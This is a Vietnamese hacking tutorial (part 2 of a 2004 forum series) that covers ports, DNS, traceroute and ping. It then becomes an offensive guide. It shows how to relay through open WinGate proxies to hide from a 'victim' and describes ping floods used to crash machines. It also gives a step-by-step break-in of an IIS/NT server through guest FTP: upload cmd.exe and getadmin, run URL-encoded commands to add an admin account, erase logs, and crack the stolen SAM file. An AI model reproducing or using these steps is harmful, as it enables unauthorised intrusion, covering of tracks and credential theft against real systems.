Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 2

Vitual port (cổng ảo) là 1 số tự nhiên đựợc gói ở trong TCP (Tranmission Control Protocol) và UDP (User Diagram Protocol) header. Như mọi người đã biết, Windows có thể chạy nhiều chương trình 1 lúc, mỗi chương trình này có 1 cổng riêng dùng để truyền và nhận dữ liệu.

Ví dụ 1 máy có địa chỉ IP là 127.0.0.1 chạy WebServer, FTP_Server, POP3 server,... những dịch vụ này đều được chạy trên 1 IP address là 127.0.0.1, khi một gói tin đuọc gửi đến làm thế nào máy tính của chúng ta phân biệt được gói tin này đi vào dịch vụ nào, WebServer hay FTP server hay SMTP? Chính vì thế Port xuất hiện. Mỗi dịch vụ có 1 số port mặc định, ví dụ FTP có port mặc định là 21, web service có port mặc định là 80, POP3 là 110, SMTP là 25,...

Người quản trị mạng có thể thay đổi số port mặc định này, nếu bạn ko biết số port trên một máy chủ, bạn ko thể kết nối vào dịch vụ đó được. Chắc bạn đã từng nghe nói đến PORT MAPPING nhưng có lẽ chưa biết nó là gì và chức năng thế nào. Port mapping thực ra đơn giản chỉ là quá trình chuyển đổi số port mặc định của một dịch vụ nào đó đến 1 số khác. Ví dụ Port mặc định của WebServer là 80, nhưng thỉnh thoảng có lẽ bạn vẫn thấy http://www.xxx.com:8080, 8080 ở đây chính là số port của host xxx nhưng đã đuợc người quản trị của host này "map" từ 80 thành 8080.

(Tài liệu của HVA)

Đón đọc phần 1: Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 1

15. DNS là gì?

DNS là viết tắt của Domain Name System. Một máy chủ DNS đợi kết nối ở cổng số 53, có nghĩa là nếu bạn muốn kết nối vào máy chủ đó, bạn phải kết nối đến cổng số 53. Máy chủ chạy DNS chuyển hostname bằng các chữ cái thành các chữ số tương ứng và ngược lại. Ví dụ: 127.0.0.1 -- > localhost và localhost--- > 127.0.0.1.

16. Đôi điều về Wingate

WinGate là một chương trình đơn giản cho phép bạn chia các kết nối ra. Thí dụ: bạn có thể chia sẻ 1 modem với 2 hoặc nhiều máy. WinGate dùng với nhiều proxy khác nhau có thể che giấu bạn.

Làm sao để Wingate có thể che dấu bạn? Hãy làm theo tôi: Bạn hãy telnet trên cổng 23 trên máy chủ chạy WinGate telnet proxy và bạn sẽ có dấu nhắc WinGate >. Tại dấu nhắc này bạn đánh vào tên server, cùng một khoảng trống và cổng bạn muốn kết nối vào. Ví dụ:

CODE

telnet wingate.net
WinGate > victim.com 23

Ta telnet đến cổng 23 vì đây là cổng mặc định khi bạn cài Wingate. Lúc này IP trên máy mà victim chộp được của ta là IP của máy chủ chứa Wingate proxy đó.

Làm sao để tìm Wingate?

+ Nếu bạn muốn tìm IP WinGates tĩnh (IP không đổi) thì đến yahoo hay một trang tìm kiếm cable modem. Tìm kiếm cable modems vì nhiều người dùng cable modems có WinGate để họ có thể chia sẻ đường truyền rộng của nó cable modems cho những máy khác trong cùng một nhà. Hoặc bạn có thể dùng Port hay Domain scanners và scan Port 1080.

+ Để tìm IP động (IP thay đổi mỗi lần user kết nối vào internet) của WinGates bạn có thể dùng Domscan hoặc các chương trình quét khác. Nếu dùng Domscan bạn hãy nhập khoảng IP bất kỳ vào box đầu tiên và số 23 vào box thứ 2. Khi đã có kết quả, bạn hãy thử lần lượt telnet đến các địa chỉ IP tìm đựơc ( đã hướng dẫn ở trên ), nếu nó xuất hiện dấu “Wingate >” thì bạn đã tìm đúng máy đang sử dụng Wingate rồI đó.

+ Theo kinh nghiệm của tôi thì bạn hãy down wingatescanner về mà sài , nó có rất nhièu trên mạng.

17. Đôi điều về Traceroute

Traceroute là một chương trình cho phép bạn xác định được đường đi của các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.

Bạn hãy xem VD sau:

CODE

C:\windows > tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có địa chỉ ip là 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở trên, các gói packets từ máy tôi muốn đến được 203.94.12.54 phải đi qua 13 hops(mắc xích) trên mạng. Đây là đưòng đi của các gói packets.

Bạn hãy xem VD tiếp theo:

CODE

host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

+ Dòng đầu tiên cho biết hostname và địa chỉ IP của hệ thống đích. Dòng này còn cho chúng ta biết thêm giá trị TTL<=30 và kích thước của datagram là 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).

+ Dòng thứ 2 cho biết router đầu tiên nhận được datagram là 202.xy.34.12, giá trị của TTL khi gởi đến router này là 1. Router này sẽ gởi trở lại cho chương trình traceroute một ICMP message error "Time Exceeded". Traceroute sẽ gởi tiếp một datagram đến hệ thống đích.

+ Dòng thứ 3, xyz.com(202.xx.12.34) nhận được datagram có TTL=1(router thứ nhất đã giảm một trước đó - TTL=2-1=1). Tuy nhiên, xyz.com không phải là một router, nó sẽ gởi trở lại cho traceroute một ICMP error message "Port Unreachable". Khi nhận được ICMP message này, traceroute sẽ biết được đã đến được hệ thống đích xyz.com và kết thúc nhiệm vụ tại đây.

+ Trong trường hợp router không trả lời sau 5 giây, traceroute sẽ in ra một dấu sao "*" (không biết) và tiếp tục gởi datagram khác đến host đích!

Chú ý:

  • Trong Windows: tracert hostname
  • Trong Unix: traceroute hostname

(Tài liệu của viethacker.net )

18. Ping và cách sử dụng

Ping là 1 khái niệm rât đơn giản tuy nhiên rất hữu ích cho việc chẩn đoán mạng. Tiểu sử của từ "ping" như sau: Ping là tiếng động vang ra khi 1 tàu ngầm muốn biết có 1 vật thể khác ở gần mình hay ko, nếu có 1 vật thể nào đó gần tàu ngầm tiếng sóng âm này sẽ va vào vật thể đó và tiếng vang lại sẽ là "pong" vậy thì tàu ngầm đó sẽ biết là có gì gần mình.

Trên Internet, khái niệm Ping cũng rất giống với tiểu sử của nó như đã đề cập ở trên. Lệnh Ping gửi một gói ICMP (Internet Control Message Protocol) đến host, nếu host đó "pong" lại có nghĩa là host đó tồn tại (hoặc là có thể với tới được). Ping cũng có thể giúp chúng ta biết được luợng thời gian một gói tin (data packet) đi từ máy tính của mình đến 1 host nào đó.

Ping thật dễ dàng, chỉ cần mở MS-DOS, và gõ "ping địa_chỉ_ip", mặc định sẽ ping 4 lần, nhưng bạn cũng có thể gõ

CODE

ping ip.address -t

Cách này sẽ làm máy ping mãi. Để thay đổi kích thước ping làm như sau:

CODE

ping -l (size) địa_chỉ_ip

Cái ping làm là gửi một gói tin đến một máy tính, sau đó xem xem mất bao lâu gói tin rồi xem xem sau bao lâu gói tin đó quay trở lại, cách này xác định được tốc độ của kết nối, và thời gian cần để một gói tin đi và quay trở lại và chia bốn (gọi là "trip time"). Ping cũng có thể được dùng để làm chậm đi hoặc đổ vỡ hệ thống bằng lụt ping. Windows 98 treo sau một phút lụt ping (Bộ đệm của kết nối bị tràn – có qua nhiều kết nối, nên Windows quyết định cho nó đi nghỉ một chút). Một cuộc tấn công "ping flood" sẽ chiếm rất nhiều băng thông của bạn, và bạn phải có băng thông lớn hơn đối phương (trừ khi đối phương là một máy chạy Windows 98 và bạn có một modem trung bình, bằng cách đó bạn sẽ hạ gục đối phương sau xấp xỉ một phút lụt ping). Lụt Ping không hiệu quả lắm đổi với những đối phương mạnh hơn một chút. Trừ khi bạn có nhiều đường và bạn kiểm soát một số lượng tương đối các máy chủ cùng ping mà tổng băng thông lớn hơn đối phương.

Chú ý: option –t của DOS không gây ra lụt ping, nó chỉ ping mục tiêu một cách liên tục, với những khoảng ngắt quãng giữa hai lần ping liên tiếp. Trong tất cả các hệ Unix hoặc Linux, bạn có thể dùng ping -f để gây ra lụt thực sự. Thực tế là phải ping -f nếu bạn dùng một bản tương thích POSIX (POSIX - Portable Operating System Interface dựa trên uniX), nếu không nó sẽ không phải là một bản Unix/Linux thực sự, bởi vậy nếu bạn dùng một hệ điều hành mà nó tự cho nó là Unix hay Linux, nó sẽ có tham số -f.

(Tài liệu của HVA và viethacker.net)

19. Kỹ thuật xâm nhập Window NT từ mạng Internet

Đây là bài học hack đầu tiên mà tôi thực hành khi bắt đầu nghiên cứu về hack, bây giờ tôi sẽ bày lại cho các bạn. Bạn sẽ cần phải có một số thờI gian để thực hiện được nó vì nó tuy dễ nhưng khó. Ta sẽ bắt đầu:
Đầu tiên bạn cần tìm một server chạy IIS:

Tiếp đến bạn vào DOS và đánh "FTP". VD:

c:\Ftp www.dodgyinc.com

(Trang này khi tôi thực hành thì vẫn còn làm được, bây giờ không biết họ đã fix chưa, nếu bạn nào có trang nào khác thì hãy post lên cho mọi người cùng làm nhé)

Nếu connect thành công, bạn sẽ thấy một số dòng tương tự như thế này:

CODE

Connected to www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):

Cái mà ta thấy ở trên có chứa những thông tin rất quan trọng, nó cho ta biết tên Netbios của máy tính là "Vdodgy". Từ điều này bạn có thể suy diễn ra tên mà được sử dụng cho NT để cho phép ta có thể khai thác, mặc định mà dịch vụ FTP gán cho nó nếu nó chưa đổi tên sẽ là “IUSR_VDODGY”. Hãy nhớ lấy vì nó sẽ có ích cho ta. Nhập "anonymous” trong user nó sẽ xuất hiện dòng sau:

CODE

331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

Bây giờ password sẽ là bất cứ gì mà ta chưa biết, tuy nhiên, bạn hãy thử đánh vào password là “anonymous”. Nếu nó sai, bạn hãy log in lại thiết bị FTP, bạn hãy nhớ là khi ta quay lại lần này thì không sử dụng cách mạo danh nữa (anonymous) mà sử dụng "Guest”, thử lại passwd với “guest” xem thế nào.

Bây giờ bạn hãy đánh lệnh trong DOS:

CODE

Cd /c

Và sẽ nhìn thấy kết quả nếu như bạn đã xâm nhập thành công, bây giờ bạn hãy nhanh chóng tìm thư mục "cgi-bin". Nếu như bạn may mắn, bạn sẽ tìm được dễ dàng vì thông thường hệ thống quản lý đã đặt "cgi-bin" vào nơi mà ta vừa xâm nhập để cho các người quản lý họ dễ dàng điều khiển mạng hơn. Thư mục cgi-bin có thể chứa các chương trình mà bạn có thể lợi dụng nó để chạy từ trình duyệt Web của bạn. Ta hãy bắt đầu “quậy” nào greenbiggrin.gif greenbiggrin.gif.

Đầu tiên, bạn hãy chuyển tới thư mục cgi-bin và sử dụng lệnh “Binary” (có thể các bạn không cần dùng lệnh này), sau đó bạn đánh tiếp lệnh “put cmd.exe”. Tiếp theo là bạn cần có file hack để cài vào thư mục này, hãy tìm trên mạng để lấy 2 file quan trọng nhất đó là "getadmin.exe" và "gasys.dll". Download chúng xuống, một khi bạn đã có nó hãy cài vào trong thư mục cgi-bin. Ok, coi như mọi việc đã xong, bạn hãy đóng cửa sổ DOS.

Bây giờ bạn hãy đánh địa chỉ sau lên trình duyệt của bạn:

http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?IUSR_VDODGY

Sau vài giây bạn sẽ có được câu trả lời như ở dưới đây :

CODE

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Congratulations, now account IUSR_VDODGY have administrator rights!

Thế là bạn đã mạo danh admin để xâm nhập hệ thống, việc cần thiết bây giờ là bạn hãy tự tạo cho mình một account, hãy đánh dòng sau trên IE:

http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2 0hacker%20toilahacker%20/add

Dòng lệnh trên sẽ tạo cho bạn một account login với user: anhdenday và password: toilahacker. Bây giờ bạn hãy làm cho user này có account của admin, bạn chỉ cần đánh lên IE lệnh:

http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?anhdenday

Vậy là xong rùi đó, bạn hãy disconnect và đến Start Menu -> find rồi search computer "www.dodgyinc.com". Khi tìm thấy, bạn vào explore, explore NT sẽ mở ra bạn hay nhập user và password để mở nó (của tôi là user: anhdenday và password: toilahacker).

Có một vấn đề là khi bạn xâm nhập hệ thống này thì sẽ bị ghi lại, do đó để xoá dấu vết bạn hãy vào "Winnt\system32\logfiles" mở file log đó rồi xoá những thông tin liên quan đến bạn, rồi save chúng. Nếu bạn muốn lấy một thông báo gì về việc chia sẻ sự xâm nhập thì bạn hãy thay đổi ngày tháng trên máy tính vớI URL sau:

http://www.dodgyinc.com/cgi-bin/cm d.exe?/c%20date%2030/04/03

Xong rồi bạn hãy xoá file "getadmin.exe", và "gasys.dll" từ "cgi-bin". Mục đích khi ta xâm nhập hệ thống này là “chôm” pass của admin để lần sau xâm nhập một cách hợp lệ, do đó bạn hãy tìm file SAM (chứa pass của admin và member) trong hệ thống rồi dùng chương trình “l0pht crack” để crack pass (Hướng dẫn về cách sử dụng “l0pht crack v 3.02” tôi đã post lên rồi, các bạn hãy tự nghiên cứu nhé). Đây là link: http://vnhacker.org/forum/?act=ST& f=6&t=11566&s=

Khi crack xong các bạn đã có user và pass của admin rồi, bây giờ hãy xoá account của user (của tôi là “anhdenday”) đi cho an toàn. Bạn đã có thể làm gì trong hệ thống là tuỳ thích, nhưng các bạn đừng xoá hết tài liệu của họ nhé, tội cho họ lắm.

Bạn cảm thấy thế nào, rắc rối lắm phải không. Lúc tôi thử hack cách này, tôi đã mày mò mất cả 4 giờ, nếu như bạn đã quen thì lần thứ 2 bạn sẽ mất ít thờI gian hơn.

Ở phần 3 tôi sẽ đề cập đến HĐH Linux, đến cách ngắt mật khẩu bảo vệ của một website, và làm thế nào để hack một trang web đơn giản nhất, v.v…

Hết phần 2

Tác giả: Anhdenday - HVAOnline.net

Thứ Hai, 11/10/2004 15:11
4,443 👨 50.498
1 Bình luận
Sắp xếp theo
  • Anh Vũ Nguyễn
    Anh Vũ Nguyễn

    Bài viết này sẽ giúp toi về sao. Thanks

    Thích Phản hồi 20/02/21
    ❖ Giải pháp bảo mật